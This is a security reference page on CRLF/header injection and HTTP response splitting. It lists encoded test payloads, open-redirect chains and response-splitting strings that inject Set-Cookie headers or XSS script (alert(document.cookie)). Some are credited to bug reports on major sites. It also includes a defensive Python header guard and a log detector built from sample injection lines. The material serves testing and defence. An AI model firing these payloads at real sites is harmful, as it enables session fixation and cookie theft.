
Header Injection

CRLF Injection || HTTP Response Splitting

Header Injection aka CRLF Injection aka HTTP Response Splitting

A parameter that is reflected into a response header may let an attacker add extra headers to the response, because a CR/LF sequence in the input terminates the current header line and everything after it is parsed as a new header (or, after a blank line, as the response body).

Header Injection Example

https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20test

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8[CR][LF]
Set-Cookie: foo=[CR][LF]
[CR][LF]
<img src="
Set-Cookie: twitter_sess=[...]; HTTPOnly[CR][LF]
[CR][LF]
<p class="twttr">Original response body</p>

This attack can lead to open redirects and session fixation (for example via an injected Set-Cookie header, as shown above).

Test Cases

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header
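The payloads above differ only in how the line break is encoded (raw, single-, double- and triple-percent-encoded, the non-standard %uXXXX form, and the U+560A/U+560D characters from the Firefox example further down). Two defensive checks follow as an added example, not code from the original page: a server-side guard that refuses to emit any header whose name or value contains a line-breaking character, and a log detector that repeatedly decodes request targets so that each of these encodings reduces to the CR/LF the back end would eventually see. The log lines are constructed samples; the function and regex names are the author's own choices.

```python
import re
from urllib.parse import unquote

# Characters that terminate a header line. U+560A/U+560D are included because
# some legacy browser/server stacks normalised them to CR/LF (the
# "Firefox blacklist" payload shown on this page).
LINE_BREAKERS = re.compile(r"[\r\n\u560a\u560d]")


def safe_header(name: str, value: str) -> tuple[str, str]:
    """Server-side guard: refuse any header whose name or value could end the
    current header line and start a new one. Returns (name, value) if safe."""
    for part in (name, value):
        if LINE_BREAKERS.search(part):
            raise ValueError(f"line break in header {name!r}: {part!r}")
    return name, value


_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_url_component(raw: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly so that nested encodings (%250a, %25250a,
    %25%30%61) and the non-standard %uXXXX form all collapse to the characters
    a permissive back end would see. Stops when a round changes nothing."""
    current = raw
    for _ in range(max_rounds):
        decoded = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), current)
        decoded = unquote(decoded)  # also turns %E5%98%8A into U+560A
        if decoded == current:
            break
        current = decoded
    return current


_REQUEST_LINE = re.compile(r"^(?:GET|POST|HEAD|PUT|DELETE)\s+(\S+)\s+HTTP/")


def find_crlf_attempts(log_lines):
    """Detection: return (line, decoded_target) for every request line whose
    target, once fully decoded, contains a line-breaking character."""
    hits = []
    for line in log_lines:
        match = _REQUEST_LINE.match(line)
        if not match:
            continue
        decoded = decode_url_component(match.group(1))
        if LINE_BREAKERS.search(decoded):
            hits.append((line, decoded))
    return hits


# Constructed sample request lines (not real traffic) covering the encodings
# from the test-case list: one benign request and five injection attempts.
SAMPLE_LOG = [
    "GET /?next=/home HTTP/1.1",
    "GET /?next=%0d%0aSet-Cookie:x=y HTTP/1.1",
    "GET /%25250aheader:header HTTP/1.1",
    "GET /%25%30%61header:header HTTP/1.1",
    "GET /%u000aheader:header HTTP/1.1",
    "GET /?id=%E5%98%8A%E5%98%8Dheader:header HTTP/1.1",
]

if __name__ == "__main__":
    for line, decoded in find_crlf_attempts(SAMPLE_LOG):
        print(f"FLAGGED {line!r} -> {decoded!r}")
    print(safe_header("Location", "/home"))
```

The guard is the real fix: frameworks that build headers from user input should reject CR, LF and the Unicode look-alikes outright rather than try to strip them. The detector is deliberately more permissive than any one server, decoding up to five rounds, so that an entry flagged in the logs tells you which encoding the probe used and lets you confirm how your own stack actually handles it.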

Open Redirect Examples

CRLF chained with Open Redirect server misconfiguration

Note

This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

//www.google.com/%2f%2e%2e%0d%0aheader:header

/www.google.com/%2e%2e%2f%0d%0aheader:header

/google.com/%2F..%0d%0aheader:header

Firefox Blacklist Examples (old)

%E5%98%8A%E5%98%8Dheader:header

CRLF Injection to XSS

%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

Response splitting on 302 Redirect, before Location header (Discovered in DoD)

%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

Response splitting on a 301 response, chained with an open redirect to corrupt the Location header and break the 301

by @black2fan (Facebook bug)

Note

xxx:1 was used to break the open redirect destination (the Location header). A great example of how to escalate CRLF injection to XSS on a 301 status code that would otherwise seem unexploitable.

%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr